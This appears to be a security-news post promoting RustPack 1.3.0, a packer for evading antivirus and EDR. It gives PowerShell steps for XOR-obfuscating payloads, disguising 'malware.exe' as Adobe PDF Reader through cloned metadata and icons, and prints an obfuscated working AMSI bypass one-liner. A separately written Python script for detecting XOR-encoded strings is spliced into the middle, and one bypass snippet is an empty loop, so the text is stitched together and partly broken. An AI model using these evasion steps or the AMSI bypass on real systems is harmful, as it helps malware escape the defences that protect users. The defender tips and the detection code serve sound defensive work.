RustPack version 1.3.0 introduces significant improvements in evading detection mechanisms, making it a powerful tool for red teamers and penetration testers. This release focuses on reducing Indicators of Compromise (IoCs), enhancing AMSI/ETW bypass techniques, and improving payload metadata randomization.
Key Features
1. Reduced IoCs via Legitimate-Looking Encoding
Instead of using suspicious string-based encoding (UUID, MAC, IPv4 endings), RustPack now employs an encoding method that mimics legitimate code, lowering entropy-based detection risks.
2. Expanded AMSI & ETW Bypass Techniques
- 7 AMSI Bypasses (including a customized Ruy-Lopez version that blocks AMSI-related DLLs and userland hooks).
- 5 ETW Bypasses (some unpublished in open-source tools for long-term evasion).
3. Randomized Metadata & Icons
- Executables/DLLs now use randomized copyright info, versions, and icons.
- Operators can clone metadata/icons from benign files (e.g., PDFs) for further stealth.
You Should Know: Practical Implementation
1. Simulating RustPack’s String Obfuscation
To mimic RustPack’s encoding, use XOR-based obfuscation in PowerShell:
$plainText = "malicious_payload"
$key = 0x55
$obfuscated = $plainText.ToCharArray() | % { [char]($_ -bxor $key) }
$obfuscated -join ""
2. Testing AMSI Bypasses
Try the Ruy-Lopez-inspired bypass (blocking AMSI DLLs):
$amsiDlls = @("amsi.dll", "user32.dll")
foreach ($dll in $amsiDlls) {
}
3. Cloning File Metadata (Linux/Windows)
- Windows (via PowerShell):
(Get-Item "legit.pdf").VersionInfo | fl
(Get-Item "malware.exe").VersionInfo.FileDescription = "Adobe PDF Reader"
- Linux (using exiftool):
exiftool -TagsFromFile legit.pdf malware.exe
4. Randomizing Icons on Windows
Use `Resource Hacker` to swap icons:
ResourceHacker -open malware.exe -save output.exe -action addskip -res legit.ico -mask ICONGROUP,1,
What Undercode Say
RustPack 1.3.0 exemplifies modern anti-forensic techniques, blending into legitimate environments while evading AV/EDR. Key takeaways:
– Obfuscation > Encryption (lower entropy = fewer alerts).
– AMSI/ETW bypasses must evolve (vendors catch up quickly).
– Metadata matters (randomized metadata and icons reduce heuristic flags).
For defenders:
- Monitor unusual DLL loading (e.g., `amsi.dll` blocked from loading into a script host).
- Analyze file metadata inconsistencies (e.g., EXE with PDF icon).
- Hunt for XOR-encoded strings in process memory.
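The two defender takeaways above (entropy as a signal, and hunting XOR-encoded strings in memory) are easier to judge with a small experiment. The Python below is an added example, not code from the post or from RustPack: it measures Shannon entropy of a buffer and brute-forces all 256 single-byte XOR keys against a list of hunt keywords. The keyword list, the "memory" buffer and the key values are constructed for the demonstration; `AmsiScanBuffer` and `EtwEventWrite` are assumed here as the API names a hunter would look for alongside the `amsi.dll` string the post names.

```python
import hashlib
import math
from collections import Counter

# Strings a defender hunts for in process memory. amsi.dll and ETW are named in
# the post; the exported-function names are an assumption for this example.
KEYWORDS = [b"amsi.dll", b"AmsiScanBuffer", b"EtwEventWrite", b"ntdll.dll"]


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the scheme used in the post's PowerShell snippet)."""
    return bytes(b ^ key for b in data)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    # Sorted so two buffers with the same frequency multiset yield the identical float
    # (floating-point summation order matters).
    return -sum((c / n) * math.log2(c / n) for c in sorted(Counter(data).values()))


def find_xor_keywords(buffer: bytes, keywords=KEYWORDS):
    """
    Try all 256 single-byte keys. Rather than decoding the whole buffer 256 times,
    XOR each keyword with the candidate key and search for that pattern; key 0
    reports plaintext occurrences. Returns a list of (key, offset, keyword).
    """
    hits = []
    for key in range(256):
        for kw in keywords:
            pattern = xor_single_byte(kw, key)
            pos = buffer.find(pattern)
            while pos != -1:
                hits.append((key, pos, kw.decode()))
                pos = buffer.find(pattern, pos + 1)
    return hits


# --- Constructed sample data (not a real memory dump) ----------------------
PLAIN_TEXT = (
    b"Copyright (c) Contoso Software 2024. All rights reserved. "
    b"This program cannot be run in DOS mode. "
    b"Microsoft Corporation. Windows Shell Common Dll. "
)
# Deterministic high-entropy reference (stands in for encrypted or packed data).
PSEUDO_RANDOM = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(32))  # 1024 bytes

SAMPLE_MEMORY = (
    PLAIN_TEXT
    + b"ntdll.dll\x00"                          # plaintext import name, reported with key 0
    + xor_single_byte(b"amsi.dll", 0x55)        # single-byte XOR, same key as the post's snippet
    + b"\x00" * 16
    + xor_single_byte(b"EtwEventWrite", 0x3C)   # a second key inside the same buffer
    + PSEUDO_RANDOM[:64]
)


def entropy_report(text: bytes = PLAIN_TEXT) -> dict:
    """Entropy of the same text in plain form, XOR'd with one byte, and a random reference."""
    return {
        "plain": shannon_entropy(text),
        "xor_0x55": shannon_entropy(xor_single_byte(text, 0x55)),
        "pseudo_random": shannon_entropy(PSEUDO_RANDOM),
    }


def scan_summary(buffer: bytes = SAMPLE_MEMORY) -> set:
    """Distinct (key, keyword) pairs found in the buffer, convenient for triage."""
    return {(key, kw) for key, _, kw in find_xor_keywords(buffer)}


if __name__ == "__main__":
    for name, value in entropy_report().items():
        print(f"{name:14s} {value:.3f} bits/byte")
    for key, offset, kw in sorted(find_xor_keywords(SAMPLE_MEMORY)):
        print(f"key=0x{key:02x} offset={offset:5d} {kw}")
```

Two things the run makes concrete. First, single-byte XOR is a permutation of byte values, so the XOR'd text has exactly the same entropy as the plaintext: an entropy threshold separates packed or encrypted blobs from text, but it cannot distinguish XOR-obfuscated strings from benign ones, which is why the post's "lower entropy" point works in the packer's favour. Second, keyword hunting with a key brute-force costs only 256 × (number of keywords) pattern searches per buffer, so it is cheap enough to run over a memory dump or a suspicious file and reports the key alongside each hit.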
Expected Output:
Sample AMSI bypass (one-liner)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( <a href=""{1}{0}"-F'F','rE'">TYpE</a> ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A<code>ss</code>Embly"."GET<code>TY</code>Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g<code>etf</code>iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE<code>T</code>VaLUE"( ${n<code>ULl},${t</code>RuE} )
Relevant URLs:
- MSec Operations UG (Contact for RustPack)
Summary:
A technical deep-dive into RustPack’s evasion techniques, including PoC commands for red teams and detection logic for blue teams.
References:
Reported By: Msec Operations – Hackers Feeds